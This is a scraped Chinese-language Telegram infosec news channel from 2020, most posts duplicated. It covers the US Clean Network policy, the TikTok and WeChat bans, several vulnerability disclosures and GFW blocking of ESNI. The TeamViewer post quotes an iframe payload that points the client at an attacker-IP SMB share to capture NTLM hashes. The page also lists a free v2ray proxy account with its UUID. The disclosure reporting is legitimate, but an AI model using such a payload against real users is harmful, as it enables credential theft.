This media is not supported in your browser
VIEW IN TELEGRAM
美国推出干净网络全面对抗中共
周二,美国国务卿蓬佩奥宣布实施专门针对中共制订的“干净网络”政策,目的是彻底终结中共利用通讯和互联网行业对美国的侵害。
今年4月,蓬佩奥宣布了美国的“干净路径”政策,禁止使用任何由华为、中兴等受中共控制的电信公司所提供设备和服务。
而国务院周三宣布的政策是对“干净路径”政策的重大升级和扩展,增加了“干净运营商”、“干净软件”、“干净应用商店”、“干净云端”和“干净电缆”5大领域。
根据新政策,美国将拒绝中共电信运营商,在未来为美国与其它国家间的国际电信提供服务,同时责成联邦电信委员会(FCC),终止中国电信等3家中共企业正在美国提供的电信服务。
美国的应用软件商店也将清理所有不被信任的中国应用程序。
同时,美国政府还将禁止华为等中国供应商,预装或提供下载美国应用程序,避免美国企业成为华为和中共侵犯人权的帮凶。
此外,川普政府还将限制中国的云服务提供商在美国收集、存储和处理大数据及敏感信息的能力。
而“干净电缆”政策,将确保中共无法从美国和其它国家连入全球互联网的海底电缆中窃取信息。
国务院周三推出“干净网络”政策,是美国近期一系列抵制中共侵略行为的最新措施,旨在彻底断绝中共利用互联网和通讯行业对美国进行侵犯。
#美国 #中共 #信息安全 #干净网络
信息安全技术频道🔎
@tg_InternetSecurity
周二,美国国务卿蓬佩奥宣布实施专门针对中共制订的“干净网络”政策,目的是彻底终结中共利用通讯和互联网行业对美国的侵害。
今年4月,蓬佩奥宣布了美国的“干净路径”政策,禁止使用任何由华为、中兴等受中共控制的电信公司所提供设备和服务。
而国务院周三宣布的政策是对“干净路径”政策的重大升级和扩展,增加了“干净运营商”、“干净软件”、“干净应用商店”、“干净云端”和“干净电缆”5大领域。
根据新政策,美国将拒绝中共电信运营商,在未来为美国与其它国家间的国际电信提供服务,同时责成联邦电信委员会(FCC),终止中国电信等3家中共企业正在美国提供的电信服务。
美国的应用软件商店也将清理所有不被信任的中国应用程序。
同时,美国政府还将禁止华为等中国供应商,预装或提供下载美国应用程序,避免美国企业成为华为和中共侵犯人权的帮凶。
此外,川普政府还将限制中国的云服务提供商在美国收集、存储和处理大数据及敏感信息的能力。
而“干净电缆”政策,将确保中共无法从美国和其它国家连入全球互联网的海底电缆中窃取信息。
国务院周三推出“干净网络”政策,是美国近期一系列抵制中共侵略行为的最新措施,旨在彻底断绝中共利用互联网和通讯行业对美国进行侵犯。
#美国 #中共 #信息安全 #干净网络
信息安全技术频道🔎
@tg_InternetSecurity
川普签行政令:45天后禁美企与TikTok、微信交易
美国总统特朗普6日签署2项行政命令,将在45天后禁止美国任何个人或企业与TikTok及其母公司字节跳动、WeChat及其母公司腾讯进行交易。川普表示,此举是为了保护美国人的隐私和国家安全。目前,美国国土安全部、运输安全管理局和美国武装部队已经禁止在政府手机上使用TikTok。
川普宣布在命令公布45天后,将禁止所有美国民众及企业和TikTok的中国母公司字节跳动进行任何交易,任何违反这项命令的个人或企业都可能面临制裁。
另一项行政命令是针对微信,同样将在命令公布45天后,禁止所有美国民众及企业与微信的母公司腾讯进行任何交易。川普政府一直警告,微信会自动从用户那里获取大量信息,被中共政府使用。
美国国务卿蓬佩奥表示,“由于母公司设在中国,Tiktok和微信等应用对美国公民的个人数据构成了重大威胁,更不用说中国共产党的内容审查工具了”。
美国政府正在采取行动把这些中国的应用程式从美国移动应用商店清除出去,以确保美国人的隐私和商业信息不被中共政府盗取。
#美国 #中共 #抖音 #微信
信息安全技术频道🔎
@tg_InternetSecurity
美国总统特朗普6日签署2项行政命令,将在45天后禁止美国任何个人或企业与TikTok及其母公司字节跳动、WeChat及其母公司腾讯进行交易。川普表示,此举是为了保护美国人的隐私和国家安全。目前,美国国土安全部、运输安全管理局和美国武装部队已经禁止在政府手机上使用TikTok。
川普宣布在命令公布45天后,将禁止所有美国民众及企业和TikTok的中国母公司字节跳动进行任何交易,任何违反这项命令的个人或企业都可能面临制裁。
另一项行政命令是针对微信,同样将在命令公布45天后,禁止所有美国民众及企业与微信的母公司腾讯进行任何交易。川普政府一直警告,微信会自动从用户那里获取大量信息,被中共政府使用。
美国国务卿蓬佩奥表示,“由于母公司设在中国,Tiktok和微信等应用对美国公民的个人数据构成了重大威胁,更不用说中国共产党的内容审查工具了”。
美国政府正在采取行动把这些中国的应用程式从美国移动应用商店清除出去,以确保美国人的隐私和商业信息不被中共政府盗取。
#美国 #中共 #抖音 #微信
信息安全技术频道🔎
@tg_InternetSecurity
新发现一种通过蓝牙入侵Android手机的方法
据周三在2020年黑帽大会上发表的最新DBAPPSecurity研究显示,想要从Android设备中窃取联系人,通话记录和SMS验证码等敏感信息的攻击者只需针对蓝牙协议即可。
研究人员发现,这些漏洞利用了零日漏洞,其中之一还可以使黑客在操纵不当的情况下发送假短信。
它的工作原理是,允许攻击者伪装成可信任的应用程序,并请求允许一个支持蓝牙的设备与另一个设备(如耳机或汽车的“信息娱乐”系统)共享数据的权限。为了使攻击成功进行,必须在目标设备上启用蓝牙,并且受害者必须批准攻击者的特权请求。最后,这家行动公司使攻击者能够访问受害者设备上的数据。
另一种攻击使研究人员可以利用称为“ BlueRepli”的身份验证绕过漏洞。潜在的攻击者可以通过模仿以前与目标连接的设备来绕过身份验证。受害者无需授予设备权限即可利用该漏洞利用程序。
谷歌发言人:“我们已经意识到了这个问题,目前正在与我们的合作伙伴一起开发解决方案。”
研究人员称,该漏洞不会影响iPhone。
蓝牙长期以来一直受漏洞困扰,其中包括那些可能使附近的黑客在受害设备上执行代码的漏洞。
美国国家安全局本周早些时候警告说,即使避免关闭GPS或位置服务,想要避免从手机中暴露敏感位置数据的用户也应注意,移动设备会使用WiFi或蓝牙来计算位置。
#黑客 #Android #个人隐私 #入侵 #蓝牙
信息安全技术频道🔎
@tg_InternetSecurity
据周三在2020年黑帽大会上发表的最新DBAPPSecurity研究显示,想要从Android设备中窃取联系人,通话记录和SMS验证码等敏感信息的攻击者只需针对蓝牙协议即可。
研究人员发现,这些漏洞利用了零日漏洞,其中之一还可以使黑客在操纵不当的情况下发送假短信。
它的工作原理是,允许攻击者伪装成可信任的应用程序,并请求允许一个支持蓝牙的设备与另一个设备(如耳机或汽车的“信息娱乐”系统)共享数据的权限。为了使攻击成功进行,必须在目标设备上启用蓝牙,并且受害者必须批准攻击者的特权请求。最后,这家行动公司使攻击者能够访问受害者设备上的数据。
另一种攻击使研究人员可以利用称为“ BlueRepli”的身份验证绕过漏洞。潜在的攻击者可以通过模仿以前与目标连接的设备来绕过身份验证。受害者无需授予设备权限即可利用该漏洞利用程序。
谷歌发言人:“我们已经意识到了这个问题,目前正在与我们的合作伙伴一起开发解决方案。”
研究人员称,该漏洞不会影响iPhone。
蓝牙长期以来一直受漏洞困扰,其中包括那些可能使附近的黑客在受害设备上执行代码的漏洞。
美国国家安全局本周早些时候警告说,即使避免关闭GPS或位置服务,想要避免从手机中暴露敏感位置数据的用户也应注意,移动设备会使用WiFi或蓝牙来计算位置。
#黑客 #Android #个人隐私 #入侵 #蓝牙
信息安全技术频道🔎
@tg_InternetSecurity
TeamViewer漏洞可能被利用来破解用户密码
Windows的TeamViewer中的高风险漏洞(CVE-2020-13699)可能被远程攻击者利用来破解用户的密码,从而导致进一步的系统利用。
TeamViewer是由德国公司TeamViewer GmbH开发的应用程序,它主要用于远程访问和控制各种类型的计算机系统和移动设备,还提供协作和演示功能。
CVE-2020-13699是安全漏洞,由未引用搜索路径或元素引起–更具体地说,这是由于应用程序未正确引用其自定义URI处理程序而引起的-当安装了TeamViewer漏洞版本的系统访问恶意制作的网站。
“攻击者可以使用精心制作的URL(iframe src ='teamviewer10:--play \\ attacker-IP \ share \ fake.tvs')将恶意iframe嵌入网站中,这将启动TeamViewer Windows桌面客户端并强制其执行以下操作:打开远程SMB共享。” Praetorian的安全工程师Jeffrey Hofmann解释说,他发现并负责地披露了该漏洞。
“ Windows在打开SMB共享时将执行NTLM身份验证,并且可以(使用诸如响应程序之类的工具)中继该请求以执行代码(或捕获该请求以进行哈希破解)。”
据该公司称,该漏洞影响Windows平台的TeamViewer版本8至15(最高15.8.2)。建议用户升级到15.8.3版以消除漏洞。
#漏洞 #Windows #信息安全 #TeamViewer
信息安全技术频道🔎
@tg_InternetSecurity
Windows的TeamViewer中的高风险漏洞(CVE-2020-13699)可能被远程攻击者利用来破解用户的密码,从而导致进一步的系统利用。
TeamViewer是由德国公司TeamViewer GmbH开发的应用程序,它主要用于远程访问和控制各种类型的计算机系统和移动设备,还提供协作和演示功能。
CVE-2020-13699是安全漏洞,由未引用搜索路径或元素引起–更具体地说,这是由于应用程序未正确引用其自定义URI处理程序而引起的-当安装了TeamViewer漏洞版本的系统访问恶意制作的网站。
“攻击者可以使用精心制作的URL(iframe src ='teamviewer10:--play \\ attacker-IP \ share \ fake.tvs')将恶意iframe嵌入网站中,这将启动TeamViewer Windows桌面客户端并强制其执行以下操作:打开远程SMB共享。” Praetorian的安全工程师Jeffrey Hofmann解释说,他发现并负责地披露了该漏洞。
“ Windows在打开SMB共享时将执行NTLM身份验证,并且可以(使用诸如响应程序之类的工具)中继该请求以执行代码(或捕获该请求以进行哈希破解)。”
据该公司称,该漏洞影响Windows平台的TeamViewer版本8至15(最高15.8.2)。建议用户升级到15.8.3版以消除漏洞。
#漏洞 #Windows #信息安全 #TeamViewer
信息安全技术频道🔎
@tg_InternetSecurity
几个添加telegram群组的导航网站
1. Combot:https://combot.org/telegram/top/chats
2. tele.me :https://tele.me/
3. 中文圈群组索引:https://www.telegram.url.tw/
4. Telegram 群組/頻道/機器人 公眾索引系統:https://tg.weils.net/
5. telegramindex:https://telegramindex.com/
6. 导航机器人频道:https://t.me/TG_index_channel
7. 导航机器人:https://t.me/hao1234bot
#telegram
信息安全技术频道🔎
@tg_InternetSecurity
1. Combot:https://combot.org/telegram/top/chats
2. tele.me :https://tele.me/
3. 中文圈群组索引:https://www.telegram.url.tw/
4. Telegram 群組/頻道/機器人 公眾索引系統:https://tg.weils.net/
5. telegramindex:https://telegramindex.com/
6. 导航机器人频道:https://t.me/TG_index_channel
7. 导航机器人:https://t.me/hao1234bot
#telegram
信息安全技术频道🔎
@tg_InternetSecurity
中国防火墙开始屏蔽 ESNI
Geneva、GFW Report、iYouPort团队发现中国的防火长城(GFW)已经开始封锁ESNI(加密服务器名称指示)这一TLS1.3和HTTPS的基础特性。测试发现,防火墙通过丢弃从客户端到服务器的数据包来阻止 ESNI 连接。此外,ESNI 封锁不仅会发生在 443 端口,也会发生在 1 到 65535 的所有端口。在阻断 ESNI 握手后,防火墙会继续阻断与(源IP,目标IP,目标端口) 3 元组相关的任何连接一段时间。
服务器名称指示(英语:Server Name Indication,简称SNI)是一个扩展的TLS计算机联网协议,在该协议下,在握手过程开始时客户端告诉它正在连接的服务器要连接的主机名称。这允许服务器在相同的IP地址和TCP端口号上呈现多个TLS证书,并且因此允许在相同的IP地址上提供多个安全(HTTPS)网站(或其他任何基于TLS的服务),而不需要所有这些站点使用相同的TLS证书。它与HTTP/1.1基于名称的虚拟主机的概念相同,但是用于HTTPS。所需的主机名未加密, 因此窃听者可以查看请求的网站。
由于SNI信息并非加密的,允许审查者区分出“真实”和“虚假”的服务或者识别出用户访问的网站域名。现已被部分国家用于互联网审查。
作为TLS的标准扩展实现,TLS 1.3将通过支持加密SNI以解决这个问题。目前,Cloudflare、Mozilla、Fastly和苹果的开发者已开始制定了关于加密服务器名称指示(Encrypted Server Name Indication)的草案。
#中国 #网络审查 #防火墙 #iYouPort #ESNI
信息安全技术频道🔎
@tg_InternetSecurity
Geneva、GFW Report、iYouPort团队发现中国的防火长城(GFW)已经开始封锁ESNI(加密服务器名称指示)这一TLS1.3和HTTPS的基础特性。测试发现,防火墙通过丢弃从客户端到服务器的数据包来阻止 ESNI 连接。此外,ESNI 封锁不仅会发生在 443 端口,也会发生在 1 到 65535 的所有端口。在阻断 ESNI 握手后,防火墙会继续阻断与(源IP,目标IP,目标端口) 3 元组相关的任何连接一段时间。
服务器名称指示(英语:Server Name Indication,简称SNI)是一个扩展的TLS计算机联网协议,在该协议下,在握手过程开始时客户端告诉它正在连接的服务器要连接的主机名称。这允许服务器在相同的IP地址和TCP端口号上呈现多个TLS证书,并且因此允许在相同的IP地址上提供多个安全(HTTPS)网站(或其他任何基于TLS的服务),而不需要所有这些站点使用相同的TLS证书。它与HTTP/1.1基于名称的虚拟主机的概念相同,但是用于HTTPS。所需的主机名未加密, 因此窃听者可以查看请求的网站。
由于SNI信息并非加密的,允许审查者区分出“真实”和“虚假”的服务或者识别出用户访问的网站域名。现已被部分国家用于互联网审查。
作为TLS的标准扩展实现,TLS 1.3将通过支持加密SNI以解决这个问题。目前,Cloudflare、Mozilla、Fastly和苹果的开发者已开始制定了关于加密服务器名称指示(Encrypted Server Name Indication)的草案。
#中国 #网络审查 #防火墙 #iYouPort #ESNI
信息安全技术频道🔎
@tg_InternetSecurity
中国黑客对台湾的半导体产业发动入侵
台湾在整个生存过程中都面临着与中国的生存冲突,并且多年来一直是中国政府资助的黑客攻击的目标。但是,一家台湾安全公司的一项调查显示,一群中国黑客能够深入到台湾经济核心的一个产业,实际上是掠夺了整个半导体产业。
来自台湾网络安全公司CyCraft的研究人员展示了黑客活动的细节,该活动在过去两年中至少损害了七家台湾芯片公司的利益。一系列深度入侵的出现旨在窃取尽可能多的知识产权,包括源代码,软件开发套件和芯片设计。
研究人员发现,至少在某些情况下,黑客似乎通过损害虚拟专用网络来获得对受害者网络的初始访问权限,尽管目前尚不清楚他们是否获得了该VPN访问的凭据,或者是否直接利用了VPN服务器中的漏洞。 然后,黑客通常使用渗透测试工具Cobalt Strike的定制版本,通过为其命名与Google Chrome更新文件相同的名称来掩饰他们所植入的恶意软件。他们还使用了托管在Google或Microsoft的云服务上的命令和控制服务器,从而使其通信更难被检测为异常。
Raiu说:“他们所看到的可能只是一幅大图的一小部分。” Raiu补充说,Winnti在与中国有联系的组织中广泛针对台湾地区并不是唯一的。但是他说Winnti的创新策略,例如劫持华硕的软件更新,使它们与众不同。
不过,即使在中国大规模入侵其岛屿邻国的情况下,CyCraft的达菲仍认为,半导体产业是一个特别危险的目标。他指出,窃取芯片原理图可能会允许中国黑客更容易地挖掘隐藏在计算机硬件中的漏洞。
CyCraft承认无法确定黑客对被盗的芯片设计文档和代码的处理方式。黑客活动的动机很可能只是让中国自己的半导体制造商在竞争中脱颖而出。达菲说:“这是削弱台湾经济的一部分,损害其长期生存能力的一种方式。”
#中国 #台湾 #黑客 #入侵
信息安全技术频道🔎
@tg_InternetSecurity
台湾在整个生存过程中都面临着与中国的生存冲突,并且多年来一直是中国政府资助的黑客攻击的目标。但是,一家台湾安全公司的一项调查显示,一群中国黑客能够深入到台湾经济核心的一个产业,实际上是掠夺了整个半导体产业。
来自台湾网络安全公司CyCraft的研究人员展示了黑客活动的细节,该活动在过去两年中至少损害了七家台湾芯片公司的利益。一系列深度入侵的出现旨在窃取尽可能多的知识产权,包括源代码,软件开发套件和芯片设计。
研究人员发现,至少在某些情况下,黑客似乎通过损害虚拟专用网络来获得对受害者网络的初始访问权限,尽管目前尚不清楚他们是否获得了该VPN访问的凭据,或者是否直接利用了VPN服务器中的漏洞。 然后,黑客通常使用渗透测试工具Cobalt Strike的定制版本,通过为其命名与Google Chrome更新文件相同的名称来掩饰他们所植入的恶意软件。他们还使用了托管在Google或Microsoft的云服务上的命令和控制服务器,从而使其通信更难被检测为异常。
Raiu说:“他们所看到的可能只是一幅大图的一小部分。” Raiu补充说,Winnti在与中国有联系的组织中广泛针对台湾地区并不是唯一的。但是他说Winnti的创新策略,例如劫持华硕的软件更新,使它们与众不同。
不过,即使在中国大规模入侵其岛屿邻国的情况下,CyCraft的达菲仍认为,半导体产业是一个特别危险的目标。他指出,窃取芯片原理图可能会允许中国黑客更容易地挖掘隐藏在计算机硬件中的漏洞。
CyCraft承认无法确定黑客对被盗的芯片设计文档和代码的处理方式。黑客活动的动机很可能只是让中国自己的半导体制造商在竞争中脱颖而出。达菲说:“这是削弱台湾经济的一部分,损害其长期生存能力的一种方式。”
#中国 #台湾 #黑客 #入侵
信息安全技术频道🔎
@tg_InternetSecurity
Android手机可能会通过高通芯片中的漏洞监视用户
Check Point Research说,在高通Snapdragon芯片中发现了漏洞,攻击者可以利用这些漏洞在Android手机上获取照片,视频,通话记录和其他数据。
高通公司是移动领域中的通用名称,因为其芯片已嵌入Google,三星,LG,小米,OnePlus和其他Android供应商的手机中。 根据Check Point的说法,iPhone不受这些漏洞的影响。
高通的修复只是第一步。 现在,移动供应商需要介入以向其用户应用并推出必要的补丁程序。 因此,Check Point表示,直到移动供应商部署了解决这些漏洞的全面方法之前,它不会透露有关该漏洞的全部详细信息。 这可能需要一段时间。
#Android #漏洞 #芯片技术
信息安全技术频道🔎
@tg_InternetSecurity
Check Point Research说,在高通Snapdragon芯片中发现了漏洞,攻击者可以利用这些漏洞在Android手机上获取照片,视频,通话记录和其他数据。
高通公司是移动领域中的通用名称,因为其芯片已嵌入Google,三星,LG,小米,OnePlus和其他Android供应商的手机中。 根据Check Point的说法,iPhone不受这些漏洞的影响。
高通的修复只是第一步。 现在,移动供应商需要介入以向其用户应用并推出必要的补丁程序。 因此,Check Point表示,直到移动供应商部署了解决这些漏洞的全面方法之前,它不会透露有关该漏洞的全部详细信息。 这可能需要一段时间。
#Android #漏洞 #芯片技术
信息安全技术频道🔎
@tg_InternetSecurity
Signal在中国的下载量激增
美国总统川普签发行政令,宣布在全美禁用微信和抖音。美国华人开始担忧事情的严重性,部分华人已经开始转向下载一款美国应用程序Signal。
据悉,微信称在全球有10亿用户,包括在美国的300多万华人。而对于一些留学生及当地华人来说,微信却是他们与国内亲友沟通的重要渠道,微信也因此成为中共政府向海外华人进行宣传的工具。
美国华人已经开始担忧与国内的联系受阻。其中一些人已经开始下载使用WhatsApp、Telegram和Line等其他即时通讯应用,但是这些应用在中国无法使用。
目前,Signal并未受到中共防火墙阻拦。Signal几乎不存储用户信息,消息是端到端加密传输。
由于不共享用户数据政策,Signal发言人Jun Harada拒绝分享实际下载次数,不过他表示,在川普禁令发布前几个小时,中国的下载量开始激增。他说:“与我们在香港应用商店中排名第一的情况相比,看起来可以相提并论。”
他指的是在7月份北京开始在香港实施国安法时,香港用户的下载量激增。Jun Harada说:“我们认为,这有助于我们在中国境内以及在海外华人中获得更多的主流关注。”
除了Signal,Line也是中国海外用户下载急增的通讯软件。根据市场情报公司Sensor Tower的统计,7月13日至19日期间,Line在美国至少安装了11.9万次,比前一周的3.8万次猛增213%。
Line目前在全球拥有2亿用户。Line是由韩国互联网巨头Naver创建,最近与日本雅虎合并,2014年7月在中国大陆被封杀。
#Sigmal #美国 #中国 #WhatsApp #telegram #Line
信息安全技术频道🔎
@tg_InternetSecurity
美国总统川普签发行政令,宣布在全美禁用微信和抖音。美国华人开始担忧事情的严重性,部分华人已经开始转向下载一款美国应用程序Signal。
据悉,微信称在全球有10亿用户,包括在美国的300多万华人。而对于一些留学生及当地华人来说,微信却是他们与国内亲友沟通的重要渠道,微信也因此成为中共政府向海外华人进行宣传的工具。
美国华人已经开始担忧与国内的联系受阻。其中一些人已经开始下载使用WhatsApp、Telegram和Line等其他即时通讯应用,但是这些应用在中国无法使用。
目前,Signal并未受到中共防火墙阻拦。Signal几乎不存储用户信息,消息是端到端加密传输。
由于不共享用户数据政策,Signal发言人Jun Harada拒绝分享实际下载次数,不过他表示,在川普禁令发布前几个小时,中国的下载量开始激增。他说:“与我们在香港应用商店中排名第一的情况相比,看起来可以相提并论。”
他指的是在7月份北京开始在香港实施国安法时,香港用户的下载量激增。Jun Harada说:“我们认为,这有助于我们在中国境内以及在海外华人中获得更多的主流关注。”
除了Signal,Line也是中国海外用户下载急增的通讯软件。根据市场情报公司Sensor Tower的统计,7月13日至19日期间,Line在美国至少安装了11.9万次,比前一周的3.8万次猛增213%。
Line目前在全球拥有2亿用户。Line是由韩国互联网巨头Naver创建,最近与日本雅虎合并,2014年7月在中国大陆被封杀。
#Sigmal #美国 #中国 #WhatsApp #telegram #Line
信息安全技术频道🔎
@tg_InternetSecurity
Telegram汉化包收集
【大陆】
简体中文 (@zh_CN 版):https://t.me/setlanguage/classic-zh-cn
简体中文 (聪聪):https://t.me/setlanguage/zhcncc
简体中文 (cnsimplified):https://t.me/setlanguage/cnsimplified
简体中文 (classic-zh):https://t.me/setlanguage/classic-zh
瓜体中文:https://t.me/setlanguage/duang-zh-cn
简体中文 (langCN):https://t.me/setlanguage/zhlangcn
简体中文 (zh-hans):https://t.me/setlanguage/zh-hans-beta
喵体中文 (meowcn):https://t.me/setlanguage/meowcn
文言文(chinese-ancient):https://t.me/setlanguage/chinese-ancient
【台湾】
繁体中文:https://t.me/setlanguage/zh-hant-beta
正体中文:https://t.me/setlanguage/taiwan
郭桓桓繁体中文语言包:https://t.me/setlanguage/zhong-taiwan-traditional
魔法师中文:https://t.me/setlanguage/encha
文言文版本:https://t.me/setlanguage/chinese-literary
【香港】
繁体中文 (Hong Kong):https://t.me/setlanguage/hongkong
香港人口语(hongkonger):https://t.me/setlanguage/hongkonger
广东话(Hk_road):https://t.me/setlanguage/zhhkpb1
广东话(hkcantonese):https://t.me/setlanguage/hkcantonese
#telegram
信息安全技术频道🔎
@tg_InternetSecurity
【大陆】
简体中文 (@zh_CN 版):https://t.me/setlanguage/classic-zh-cn
简体中文 (聪聪):https://t.me/setlanguage/zhcncc
简体中文 (cnsimplified):https://t.me/setlanguage/cnsimplified
简体中文 (classic-zh):https://t.me/setlanguage/classic-zh
瓜体中文:https://t.me/setlanguage/duang-zh-cn
简体中文 (langCN):https://t.me/setlanguage/zhlangcn
简体中文 (zh-hans):https://t.me/setlanguage/zh-hans-beta
喵体中文 (meowcn):https://t.me/setlanguage/meowcn
文言文(chinese-ancient):https://t.me/setlanguage/chinese-ancient
【台湾】
繁体中文:https://t.me/setlanguage/zh-hant-beta
正体中文:https://t.me/setlanguage/taiwan
郭桓桓繁体中文语言包:https://t.me/setlanguage/zhong-taiwan-traditional
魔法师中文:https://t.me/setlanguage/encha
文言文版本:https://t.me/setlanguage/chinese-literary
【香港】
繁体中文 (Hong Kong):https://t.me/setlanguage/hongkong
香港人口语(hongkonger):https://t.me/setlanguage/hongkonger
广东话(Hk_road):https://t.me/setlanguage/zhhkpb1
广东话(hkcantonese):https://t.me/setlanguage/hkcantonese
#telegram
信息安全技术频道🔎
@tg_InternetSecurity
Telegram
Change Language: Chinese (Simplified, @zh_CN)
Opening this link will translate the interface of Telegram to a different language. You can change the language back in Settings.
👍1
Google Chrome漏洞使数十亿用户数据遭窃
Google的基于Chromium的浏览器中的漏洞可能使攻击者绕过网站上的内容安全政策(CSP),从而窃取数据并执行恶意代码。
据PerimeterX网络安全研究人员Gal Weizman称,该漏洞(CVE-2020-6519)可在Windows,Mac和Android的Chrome,Opera和Edge中找到——这可能影响数十亿网络用户。 Chrome的73(2019年3月)到83版本(84版本在7月发布并修复了该问题)受到影响。
CSP是一种网络标准,旨在阻止某些类型的攻击,包括跨站点脚本(XSS)和数据注入攻击。 CSP允许Web管理员指定浏览器应视为可执行脚本有效来源的域。然后,与CSP兼容的浏览器将仅执行从这些域接收的源文件中加载的脚本。
研究人员指出,大多数网站都使用CSP,包括ESPN,Facebook,Gmail,Instagram,TikTok,WhatsApp,Wells Fargo和Zoom等互联网巨头。某些著名的网站不受影响,包括GitHub,Google Play商店,LinkedIn,PayPal,Twitter,Yahoo的登录页面和Yandex。
要利用此漏洞,攻击者首先需要(通过暴力破解密码或其他方法)访问Web服务器,以便能够修改其使用的JavaScript代码。然后,攻击者可以在JavaScript中添加frame-src或child-src指令,以允许注入的代码加载并执行它,从而绕过CSP强制执行。
该漏洞已在Chrome浏览器中存在超过一年,但未得到修复,Weizman警告说,“该漏洞的全部影响尚不为人所知,极有可能在未来几个月内,我们将了解利用该漏洞的人是出于什么目的将个人身份信息(PII)泄露出去的。”
#Chrome #漏洞 #个人隐私 #浏览器
信息安全技术频道🔎
@tg_InternetSecurity
Google的基于Chromium的浏览器中的漏洞可能使攻击者绕过网站上的内容安全政策(CSP),从而窃取数据并执行恶意代码。
据PerimeterX网络安全研究人员Gal Weizman称,该漏洞(CVE-2020-6519)可在Windows,Mac和Android的Chrome,Opera和Edge中找到——这可能影响数十亿网络用户。 Chrome的73(2019年3月)到83版本(84版本在7月发布并修复了该问题)受到影响。
CSP是一种网络标准,旨在阻止某些类型的攻击,包括跨站点脚本(XSS)和数据注入攻击。 CSP允许Web管理员指定浏览器应视为可执行脚本有效来源的域。然后,与CSP兼容的浏览器将仅执行从这些域接收的源文件中加载的脚本。
研究人员指出,大多数网站都使用CSP,包括ESPN,Facebook,Gmail,Instagram,TikTok,WhatsApp,Wells Fargo和Zoom等互联网巨头。某些著名的网站不受影响,包括GitHub,Google Play商店,LinkedIn,PayPal,Twitter,Yahoo的登录页面和Yandex。
要利用此漏洞,攻击者首先需要(通过暴力破解密码或其他方法)访问Web服务器,以便能够修改其使用的JavaScript代码。然后,攻击者可以在JavaScript中添加frame-src或child-src指令,以允许注入的代码加载并执行它,从而绕过CSP强制执行。
该漏洞已在Chrome浏览器中存在超过一年,但未得到修复,Weizman警告说,“该漏洞的全部影响尚不为人所知,极有可能在未来几个月内,我们将了解利用该漏洞的人是出于什么目的将个人身份信息(PII)泄露出去的。”
#Chrome #漏洞 #个人隐私 #浏览器
信息安全技术频道🔎
@tg_InternetSecurity
法国着手调查TikTok对用户个人信息的收取
由于今年五月收到了一份针对TikTok的控诉,法国国家信息与自由委员会已展开调查。
保护个人信息是法国国家信息与自由委员会的一项职责,虽然没有透露五月收到的投诉具体情况如何,但委员会一位发言人表示,已经开始处理调查。
今年六月,欧洲信息保护委员会也表示将会对TikTok在欧盟境内活动的信息收集与传送方式展开调查。一名欧洲议员表示,担心这款软件收集信息的方式,认为会给个人信息安全构成风险。五月,荷兰的个人隐私捍卫机构也声称,要检查TikTok处理数百万年轻人个人信息的方式。
#抖音 #法国 #个人隐私
信息安全技术频道🔎
@tg_InternetSecurity
由于今年五月收到了一份针对TikTok的控诉,法国国家信息与自由委员会已展开调查。
保护个人信息是法国国家信息与自由委员会的一项职责,虽然没有透露五月收到的投诉具体情况如何,但委员会一位发言人表示,已经开始处理调查。
今年六月,欧洲信息保护委员会也表示将会对TikTok在欧盟境内活动的信息收集与传送方式展开调查。一名欧洲议员表示,担心这款软件收集信息的方式,认为会给个人信息安全构成风险。五月,荷兰的个人隐私捍卫机构也声称,要检查TikTok处理数百万年轻人个人信息的方式。
#抖音 #法国 #个人隐私
信息安全技术频道🔎
@tg_InternetSecurity
TikTok被指违反Android政策收集设备标识符一年半时间(cnBeta)
据外媒报道,一项来自《华尔街日报》的调查显示,TikTok的Android应用在18个月内收集了用户的MAC地址。据悉,由于这些地址是每个用户设备的唯一标识符,所以它们对广告和可能更具侵入性的跟踪形式更具价值。
在2015年,iOS的App Store和Google Play都已经将禁止对MAC地址的收集作为一项政策,但TikTok仍能通过漏洞获得该标识。《华尔街日报》援引的一项研究发现,谷歌Play Store上有近350个应用都利用了类似的漏洞,其通常目的则都是为了广告定位。
TikTok在去年11月停止了这一做法,《华尔街日报》将这一政策转变归因于来自华盛顿日益增大的政治压力。
《华尔街日报》的研究结果跟TikTok辩护的最有力论据相悖,即该系统收集的数据并不比标准的移动应用多。虽然该系统最常用于广告追踪,但收集MAC地址是这种做法中侵入性更强的一种形式。
当媒体联系到TikTok请其置评时,该公司强调已经停止了这种做法。“我们不断更新我们的应用以跟上不断发展的安全挑战,当前版本的TikTok不再收集MAC地址,”一名代表回应道,“我们一直在鼓励用户下载最新版TikTok。”
#抖音 #Android
信息安全技术频道🔎
@tg_InternetSecurity
据外媒报道,一项来自《华尔街日报》的调查显示,TikTok的Android应用在18个月内收集了用户的MAC地址。据悉,由于这些地址是每个用户设备的唯一标识符,所以它们对广告和可能更具侵入性的跟踪形式更具价值。
在2015年,iOS的App Store和Google Play都已经将禁止对MAC地址的收集作为一项政策,但TikTok仍能通过漏洞获得该标识。《华尔街日报》援引的一项研究发现,谷歌Play Store上有近350个应用都利用了类似的漏洞,其通常目的则都是为了广告定位。
TikTok在去年11月停止了这一做法,《华尔街日报》将这一政策转变归因于来自华盛顿日益增大的政治压力。
《华尔街日报》的研究结果跟TikTok辩护的最有力论据相悖,即该系统收集的数据并不比标准的移动应用多。虽然该系统最常用于广告追踪,但收集MAC地址是这种做法中侵入性更强的一种形式。
当媒体联系到TikTok请其置评时,该公司强调已经停止了这种做法。“我们不断更新我们的应用以跟上不断发展的安全挑战,当前版本的TikTok不再收集MAC地址,”一名代表回应道,“我们一直在鼓励用户下载最新版TikTok。”
#抖音 #Android
信息安全技术频道🔎
@tg_InternetSecurity
cnBeta
TikTok被指违反Android政策收集设备标识符一年半时间
据外媒报道,一项来自《华尔街日报》的调查显示,TikTok的Android应用在18个月内收集了用户的MAC地址。据悉,由于这些地址是每个用户设备的唯一标识符,所以它们对广告和可能更具侵入性的跟踪形式更具价值。
v2ray免费账号(由中国禁闻网( bannedbook.org )官方提供)
账号1(德国,WebSocket+TLS+Nginx):
Address(地址): tr4.free9999.net
Port(端口):443
UUID(用户id): aa0e5476-0613-429a-bedb-24923901040d
alterId(额外ID): 2
security(加密方式): auto
network(传输协议): ws
headerType(伪装类型): none
伪装域名(host) : tr4.free9999.net
路径: /622f/
底层传输安全:tls
